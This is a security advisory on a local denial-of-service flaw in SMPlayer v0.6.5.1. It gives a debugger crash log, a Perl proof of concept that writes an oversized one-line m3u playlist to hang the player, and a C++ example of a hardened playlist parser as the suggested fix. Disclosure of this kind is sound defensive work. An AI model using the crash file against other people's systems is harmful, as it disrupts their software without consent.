SMPlayer v0.6.5.1 - Denial of Service Vulnerability

16 Jun 2011 - Reported by Vulnerability Research Laboratory - N/A Anonymous (www.vulnerability-lab.com)
SMPlayer v0.6.5.1 Denial of Service Vulnerability in MPlayer front-end

Document Title:
===============
SMPlayer v0.6.5.1 - Denial of Service Vulnerability



Release Date:
=============
2011-06-16


Vulnerability Laboratory ID (VL-ID):
====================================
57


Product & Service Introduction:
===============================
SMPlayer intends to be a complete front-end for MPlayer, from basic features like playing videos, DVDs, and VCDs to more advanced features like support for MPlayer filters and more.

One of the most interesting features of SMPlayer: it remembers the settings of all files you play. So you start to watch a movie but you have to leave... don't worry, when you open that movie again it will resume at the same point you left it, and with the same settings: audio track, subtitles, volume...

Other additional interesting features:

    * Configurable subtitles. You can choose font and size, and even colors for the subtitles.
    * Audio track switching. You can choose the audio track you want to listen to. Works with avi and mkv. And of course with DVDs.
    * Seeking by mouse wheel. You can use your mouse wheel to go forward or backward in the video.
    * Video equalizer, allows you to adjust the brightness, contrast, hue, saturation and gamma of the video image.
    * Multiple speed playback. You can play at 2X, 4X... and even in slow motion.
    * Filters. Several filters are available: deinterlace, postprocessing, denoise... and even a karaoke filter (voice removal).
    * Audio and subtitles delay adjustment. Allows you to sync audio and subtitles.
    * Advanced options, such as selecting a demuxer or video & audio codecs.
    * Playlist. Allows you to enqueue several files to be played one after another. Autorepeat and shuffle supported too.
    * Preferences dialog. You can easily configure every option of SMPlayer by using a nice preferences dialog.
    * Possibility to search automatically for subtitles in opensubtitles.org.
    * Translations: currently SMPlayer is translated into more than 20 languages, including Spanish, German, French, Italian, Russian, Chinese, Japanese....
    * It's multiplatform. Binaries available for Windows and Linux.
    * SMPlayer is under the GPL license.

(Copy of the Vendor Homepage: http://smplayer.sourceforge.net/index.php?tr_lang=en)


Abstract Advisory Information:
==============================
Vulnerability Lab Team discovered a Denial of Service Vulnerability for SM-Player.
A local attacker is able to crash the software and all bound running processes.


Vulnerability Disclosure Timeline:
==================================
2011-06-17:	Public or Non-Public Disclosure



Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Local


Severity Level:
===============
Low


Technical Details & Description:
================================
Due to a boundary error the program produces an unknown error and then hangs.
In addition, its CPU usage rises noticeably.

Microsoft (R) Windows Debugger Version 6.11.0001.404 X86
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: C:/Program Files/SMPlayer/smplayer.exe/
Symbol search path is: *** Invalid ***
****************************************************************************
* Symbol loading may be unreliable without a symbol search path.           *
* Use .symfix to have the debugger choose a symbol path.                   *
* After setting your symbol path, use .reload to refresh symbol locations. *
****************************************************************************
Executable search path is: 
ModLoad: 00400000 00688000   image00400000
ModLoad: 7c800000 7c8c0000   ntdll.dll
ModLoad: 77e40000 77f42000   C:/WINDOWS/system32/kernel32.dll
ModLoad: 6fbc0000 6fbc8000   C:/Program Files/SMPlayer/mingwm10.dll
ModLoad: 77ba0000 77bfa000   C:/WINDOWS/system32/msvcrt.dll
ModLoad: 77670000 777a9000   C:/WINDOWS/system32/OLE32.dll
ModLoad: 77c00000 77c48000   C:/WINDOWS/system32/GDI32.dll
ModLoad: 77380000 77411000   C:/WINDOWS/system32/USER32.dll
ModLoad: 77f50000 77feb000   C:/WINDOWS/system32/ADVAPI32.dll
ModLoad: 77c50000 77cef000   C:/WINDOWS/system32/RPCRT4.dll
ModLoad: 76f50000 76f63000   C:/WINDOWS/system32/Secur32.dll
ModLoad: 10000000 100c1000   C:/Program Files/SMPlayer/QxtCore.dll
ModLoad: 6a1c0000 6a453000   C:/Program Files/SMPlayer/QtCore4.dll
ModLoad: 71c00000 71c17000   C:/WINDOWS/system32/WS2_32.DLL
ModLoad: 71bf0000 71bf8000   C:/WINDOWS/system32/WS2HELP.dll
ModLoad: 65100000 65afa000   C:/Program Files/SMPlayer/QtGui4.dll
ModLoad: 762b0000 762f9000   C:/WINDOWS/system32/COMDLG32.DLL
ModLoad: 77da0000 77df2000   C:/WINDOWS/system32/SHLWAPI.dll
ModLoad: 77530000 775c7000   C:/WINDOWS/WinSxS/x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_5.82.3790.3959_x-ww_78FCF8D0/COMCTL32.dll
ModLoad: 7c8d0000 7d0cf000   C:/WINDOWS/system32/SHELL32.dll
ModLoad: 76290000 762ad000   C:/WINDOWS/system32/IMM32.DLL
ModLoad: 77d00000 77d8b000   C:/WINDOWS/system32/OLEAUT32.DLL
ModLoad: 76aa0000 76acd000   C:/WINDOWS/system32/WINMM.DLL
ModLoad: 73070000 73097000   C:/WINDOWS/system32/WINSPOOL.DRV
ModLoad: 6ff00000 7003d000   C:/Program Files/SMPlayer/QtNetwork4.dll
ModLoad: 6ed40000 6edc5000   C:/Program Files/SMPlayer/QtXml4.dll
(b18.6e0): Break instruction exception - code 80000003 (first chance)
eax=6ee00000 ebx=7ffdf000 ecx=00000005 edx=00000020 esi=7c8877f4 edi=00241f38
eip=7c81a3e1 esp=0022fb70 ebp=0022fcb4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll - 
ntdll!DbgBreakPoint:
7c81a3e1 cc              int     3
0:000> g
ModLoad: 77420000 77523000   C:/WINDOWS/WinSxS/x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.3790.3959_x-ww_D8713E55/comctl32.dll
ModLoad: 71bc0000 71bc8000   C:/WINDOWS/system32/rdpsnd.dll
ModLoad: 771f0000 77201000   C:/WINDOWS/system32/WINSTA.dll
ModLoad: 71c40000 71c97000   C:/WINDOWS/system32/NETAPI32.dll
ModLoad: 76b70000 76b7b000   C:/WINDOWS/system32/PSAPI.DLL
ModLoad: 4b3c0000 4b410000   C:/WINDOWS/system32/MSCTF.dll
ModLoad: 77b90000 77b98000   C:/WINDOWS/system32/version.dll
ModLoad: 75e60000 75e87000   C:/WINDOWS/system32/apphelp.dll
ModLoad: 4dc30000 4dc5e000   C:/WINDOWS/system32/msctfime.ime
ModLoad: 71b70000 71ba6000   C:/WINDOWS/system32/uxtheme.dll
ModLoad: 77b90000 77b98000   C:/WINDOWS/system32/version.dll
ModLoad: 76920000 769e2000   C:/WINDOWS/system32/userenv.dll
ModLoad: 01140000 01405000   C:/WINDOWS/system32/xpsp2res.dll
(b18.6e0): Unknown exception - code 000006b5 (first chance)


Pictures:  
                                ../picture1.png



Proof of Concept (PoC):
=======================
To reproduce the bug use this Perl script to generate the m3u file.
After that drag the m3u into the main window and then open the playlist window.

use strict;
use warnings;

my $sploitfile = "name.m3u";
print " [+] Preparing payload\n";
my $junk = "A" x 950000;          # one 950000-byte line with no newline
my $payload = $junk;
print " [+] Writing payload to file\n";
open(my $sploitf, '>', $sploitfile) or die "Cannot open $sploitfile: $!";
print $sploitf $payload;
close($sploitf);
print " [+] Exploit file $sploitfile created\n";   # was the bareword sploitfile
print " [+] Wrote " . length($payload) . " bytes\n";



Solution - Fix & Patch:
=======================
Implement a boundary check for the files that get loaded.
Also validate that the file content matches the expected file type before it is parsed.
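The boundary check and file-type validation proposed above, applied to the m3u case from the PoC, as an added example in plain C++ (not SMPlayer or Qt code). The size limits, the ParseResult type and the parse_m3u function are assumptions for this illustration.

```cpp
#include <cstddef>
#include <iostream>
#include <sstream>
#include <string>
#include <vector>

// Limits are assumptions for this example, not SMPlayer's real settings.
const std::size_t kMaxPlaylistBytes = 1 << 20;  // reject files over 1 MiB
const std::size_t kMaxLineBytes     = 4096;     // reject lines over 4 KiB

struct ParseResult {
    bool ok;                           // false if the input was rejected
    std::string error;                 // why it was rejected
    std::vector<std::string> entries;  // media paths/URLs from the playlist
};

// Hardened m3u loader: size is checked before any parsing, every line is
// length-checked and must be text, and a file with no entries is refused.
ParseResult parse_m3u(const std::string& data) {
    if (data.size() > kMaxPlaylistBytes)
        return {false, "playlist exceeds size limit", {}};
    ParseResult r{true, "", {}};
    std::istringstream in(data);
    std::string line;
    while (std::getline(in, line)) {
        if (line.size() > kMaxLineBytes)
            return {false, "line exceeds length limit", {}};
        for (unsigned char c : line)
            if (c < 0x20 && c != '\t' && c != '\r')
                return {false, "non-text byte in playlist", {}};
        if (!line.empty() && line.back() == '\r') line.pop_back();
        if (line.empty() || line[0] == '#') continue;  // #EXTM3U, #EXTINF, comments
        r.entries.push_back(line);
    }
    if (r.entries.empty())
        return {false, "no playlist entries found", {}};
    return r;
}

int main() {
    // Constructed inputs: a normal playlist and the PoC's single 950000-byte line.
    const std::string normal = "#EXTM3U\n#EXTINF:1,Title\nmovie.avi\r\nhttp://example.invalid/s.mp4\n";
    const std::vector<std::string> samples = {normal, std::string(950000, 'A')};
    for (const std::string& s : samples) {
        ParseResult res = parse_m3u(s);
        std::cout << (res.ok ? "accepted, " + std::to_string(res.entries.size()) + " entries"
                             : "rejected: " + res.error) << '\n';
    }
    return 0;
}
```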


Security Risk:
==============
The Denial of Service Vulnerability can crash the software completely.
The security risk is estimated as low.


Credits & Authors:
==================
Vulnerability Research Laboratory  -   N/A   Anonymous


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    [email protected] 	- [email protected] 	       - [email protected]
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.

Copyright © 2012 | Vulnerability Laboratory


